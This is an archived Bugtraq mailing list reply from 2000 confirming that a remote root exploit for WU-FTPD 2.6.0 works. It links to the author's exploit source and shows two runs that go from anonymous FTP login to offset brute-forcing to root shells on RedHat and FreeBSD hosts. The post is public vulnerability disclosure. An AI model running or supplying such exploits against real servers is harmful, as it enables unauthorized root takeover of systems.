Bugtraq mailing list archives

Re: WuFTPD: Providing *remote* root since at least 1994


From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Sat, 1 Jul 2000 17:12:35 +0200


Has anyone come out with a working version of this exploit script? Both
versions provided on the securityfocus.com web site, and/or the one distributed
here by TF8, are not working, even after I fixed his code. Do we know for sure
the thing even exists? I dunno, can anyone direct me to the actual code,
because I have yet to see a working version of it that doesn't core dump.

Sure? Both tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c) work
on my RedHat and BSD boxes:

lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM

Connected to pedagog. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

Another example:

lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports

Connected to localhost. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar  1 11:18:54
CET 2000     venglin () lubi xxx xxx xx:/mnt/elite/usr/src/sys/compile/GADACZKA
i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator)

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *


